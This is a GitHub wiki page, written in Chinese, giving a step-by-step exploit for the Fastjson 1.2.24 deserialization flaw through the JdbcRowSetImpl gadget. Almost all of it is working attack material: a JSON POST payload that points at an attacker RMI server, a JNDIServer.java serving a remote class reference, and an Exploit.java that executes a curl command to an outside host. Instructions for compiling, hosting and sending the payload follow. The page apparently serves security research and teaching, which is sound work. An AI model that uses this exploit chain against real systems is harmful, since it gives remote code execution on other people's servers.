-
Notifications
You must be signed in to change notification settings - Fork 660
Fastjson
JoyChou edited this page Oct 22, 2018
·
5 revisions
先说针对JdbcRowSetImpl的漏洞利用。这个EXP使用条件特别苛刻,会存在各种各样的问题。比如RMI地址不通,某些Java版本不能利用等等的情况。我测试EXP的漏洞环境:
- Java 1.8.0_102
- Fastjson 1.2.24
post提交:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://test.joychou.org:1099/Exploit","autoCommit":true}
JNDIServer.java
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class JNDIServer {
public static void main(String[] args) throws Exception {
Registry registry = LocateRegistry.createRegistry(1099);
Reference reference =
new Reference("Exploit", "Exploit","http://test.joychou.org:8888/");
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("Exploit",referenceWrapper);
}
}Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
public Exploit() {
try{
// 要执行的命令
String commands = "curl http://test.joychou.org/fastjson";
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
Exploit e = new Exploit();
}
}具体利用步骤:
- 提供一个JNDI的Server
javac JNDIServer.java java JNDIServer - 编译要执行的命令,并且提供一个Web接口
javac Exploit.java java Exploit python -m SimpleHTTPServer 8888 - 提交POST的EXP,Content-Type设置为
Content-Type: application/json